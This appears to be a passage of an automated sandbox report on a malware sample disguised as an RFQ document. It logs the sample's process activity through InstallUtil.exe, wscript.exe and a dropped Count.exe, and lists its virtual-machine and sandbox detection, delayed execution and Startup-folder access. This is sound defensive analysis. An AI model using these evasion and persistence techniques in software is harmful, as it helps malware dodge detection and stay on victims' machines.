Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: RFQ-12202431_ACD_Group.pif.exe PID: 3052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Count.exe PID: 1648, type: MEMORYSTR

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390292373562.000000000300C000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.390504748872.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory allocated: 2EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory allocated: 2FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Memory allocated: 4FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: FA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory allocated: F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory allocated: 2A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Memory allocated: 2890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4970000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Window / User API: threadDelayed 9943	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 9947	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Window / User API: threadDelayed 9947	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 5276	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 5276	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 5984	Thread sleep count: 9943 > 30	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 5276	Thread sleep time: -99891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 5276	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 5276	Thread sleep time: -99672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 5276	Thread sleep time: -99563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 5276	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 5276	Thread sleep time: -99344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 5276	Thread sleep time: -99219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 5276	Thread sleep time: -99110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 5276	Thread sleep time: -98985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe TID: 5276	Thread sleep time: -98860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7208	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7208	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7716	Thread sleep count: 9947 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 3944	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 3944	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 4100	Thread sleep count: 9947 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 3944	Thread sleep time: -99891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 3944	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 3944	Thread sleep time: -99672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 3944	Thread sleep time: -99563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 3944	Thread sleep time: -99438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 3944	Thread sleep time: -99313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 3944	Thread sleep time: -99188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 3944	Thread sleep time: -99078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 3944	Thread sleep time: -98969s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 3944	Thread sleep time: -98844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe TID: 3944	Thread sleep time: -98735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4200	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 99891	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 99672	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 99563	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 99344	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 99110	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 98985	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Thread delayed: delay time: 98860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 99891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 99672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 99563	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 99438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 99313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 99188	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 99078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 98969	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 98844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Thread delayed: delay time: 98735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
